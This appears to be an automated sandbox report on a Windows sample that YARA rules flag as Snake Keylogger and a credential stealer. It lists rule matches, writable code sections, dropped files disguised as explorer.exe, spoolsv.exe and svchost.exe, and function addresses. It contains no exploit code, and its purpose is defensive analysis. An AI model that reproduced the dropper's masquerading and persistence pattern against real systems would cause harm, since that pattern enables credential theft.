Source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000002E.00000002.2941527500.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7808, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: duencaj.exe PID: 4852, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

PE file has a writeable .text section

Source: 20250301_173245__P20250301_173245__P.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: icsys.icn.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: dUENcAj.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: explorer.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: spoolsv.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: mrsys.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: svchost.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stsys.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: c:\windows\system\explorer.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: c:\windows\system\spoolsv.exe	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: c:\windows\system\spoolsv.exe	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\system\cmsys.cmn	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	File created: c:\windows\system\svchost.exe	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	File created: c:\windows\system\svchost.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\icsys.icn.exe

File deleted: C:\Windows\System\explorer.exe

Jump to behavior

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Code function: 0_2_0041F830	0_2_0041F830
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Code function: 0_2_00416130	0_2_00416130
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Code function: 0_2_00422F50	0_2_00422F50
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_07488748	1_2_07488748
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_0748A6B0	1_2_0748A6B0
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_0748529A	1_2_0748529A
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_0748B060	1_2_0748B060
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_07488FA8	1_2_07488FA8
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_07488FB8	1_2_07488FB8
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_07488B80	1_2_07488B80
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_07485AF8	1_2_07485AF8
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_0766618C	1_2_0766618C
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_076673A8	1_2_076673A8
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 1_2_07666180	1_2_07666180
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_0273D278	46_2_0273D278
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_02735378	46_2_02735378
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_0273C147	46_2_0273C147
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_0273C738	46_2_0273C738
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_0273C468	46_2_0273C468
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_0273CA08	46_2_0273CA08
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_027369A8	46_2_027369A8
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_0273E988	46_2_0273E988
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_02736FD0	46_2_02736FD0
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_0273CFA9	46_2_0273CFA9
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_0273CCD8	46_2_0273CCD8
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_02739DE0	46_2_02739DE0
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_0273E97B	46_2_0273E97B
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_0273F961	46_2_0273F961
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 46_2_02733E09	46_2_02733E09
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E8BCE8	57_2_02E8BCE8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E847C8	57_2_02E847C8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E847D8	57_2_02E847D8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E82874	57_2_02E82874
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_02E8BCD9	57_2_02E8BCD9
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_06F9618C	57_2_06F9618C
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_06F973A8	57_2_06F973A8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_06F9617D	57_2_06F9617D
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_07078748	57_2_07078748
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_0707A6B0	57_2_0707A6B0
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_0707B060	57_2_0707B060
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_07078FA8	57_2_07078FA8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_07078FB8	57_2_07078FB8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 57_2_07078B80	57_2_07078B80
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158C146	63_2_0158C146
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_01587120	63_2_01587120
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158A088	63_2_0158A088
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_01585378	63_2_01585378
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158D278	63_2_0158D278
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158C468	63_2_0158C468
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158C738	63_2_0158C738
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158E988	63_2_0158E988
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_015869A8	63_2_015869A8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_01583B95	63_2_01583B95
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158CA08	63_2_0158CA08
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158CCD8	63_2_0158CCD8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158CFAA	63_2_0158CFAA
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_01583E09	63_2_01583E09
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158E97A	63_2_0158E97A
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_0158F961	63_2_0158F961
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_015829EC	63_2_015829EC
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_01583AA1	63_2_01583AA1
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06C5326C	63_2_06C5326C
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06C5511E	63_2_06C5511E
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06C55120	63_2_06C55120
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06C5BBB1	63_2_06C5BBB1
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC9668	63_2_06DC9668
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC1FA8	63_2_06DC1FA8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC9D90	63_2_06DC9D90
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC2A90	63_2_06DC2A90
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC1850	63_2_06DC1850
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC5148	63_2_06DC5148
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCD670	63_2_06DCD670
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCD660	63_2_06DCD660
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCE7D0	63_2_06DCE7D0
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCE7C0	63_2_06DCE7C0
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC1F9C	63_2_06DC1F9C
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCDF11	63_2_06DCDF11
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCDF20	63_2_06DCDF20
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCF4D8	63_2_06DCF4D8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCF4C8	63_2_06DCF4C8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC8CC0	63_2_06DC8CC0
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC8CB1	63_2_06DC8CB1
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC9448	63_2_06DC9448
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCEC18	63_2_06DCEC18
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCEC28	63_2_06DCEC28
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCCDC0	63_2_06DCCDC0
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCCDAF	63_2_06DCCDAF
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC9D29	63_2_06DC9D29
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCDAC8	63_2_06DCDAC8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCDAB9	63_2_06DCDAB9
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCD218	63_2_06DCD218
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCE378	63_2_06DCE378
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCE369	63_2_06DCE369
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC0B30	63_2_06DC0B30
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC0B20	63_2_06DC0B20
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCF080	63_2_06DCF080
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC0040	63_2_06DC0040
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC1841	63_2_06DC1841
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCF071	63_2_06DCF071
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC0007	63_2_06DC0007
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DC5138	63_2_06DC5138
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCF930	63_2_06DCF930
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 63_2_06DCF921	63_2_06DCF921

Source: 20250301_173245__P20250301_173245__P.exe, 00000000.00000002.1687841610.00000000004E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevznv.exe" vs 20250301_173245__P20250301_173245__P.exe
Source: 20250301_173245__P20250301_173245__P.exe, 00000000.00000002.1687103200.000000000042E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWin.exe vs 20250301_173245__P20250301_173245__P.exe
Source: 20250301_173245__P20250301_173245__P.exe, 00000000.00000003.1685704586.00000000004CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevznv.exe" vs 20250301_173245__P20250301_173245__P.exe
Source: 20250301_173245__P20250301_173245__P.exe, 00000000.00000003.1686864250.00000000004E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevznv.exe" vs 20250301_173245__P20250301_173245__P.exe
Source: 20250301_173245__P20250301_173245__P.exe	Binary or memory string: OriginalFilenameWin.exe vs 20250301_173245__P20250301_173245__P.exe
Source: 20250301_173245__P20250301_173245__P.exe	Binary or memory string: OriginalFilenamevznv.exe" vs 20250301_173245__P20250301_173245__P.exe

Source: 20250301_173245__P20250301_173245__P.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 46.2.20250301_173245__p20250301_173245__p.exe .400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 46.2.20250301_173245__p20250301_173245__p.exe .400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 46.2.20250301_173245__p20250301_173245__p.exe .400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000002E.00000002.2941527500.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
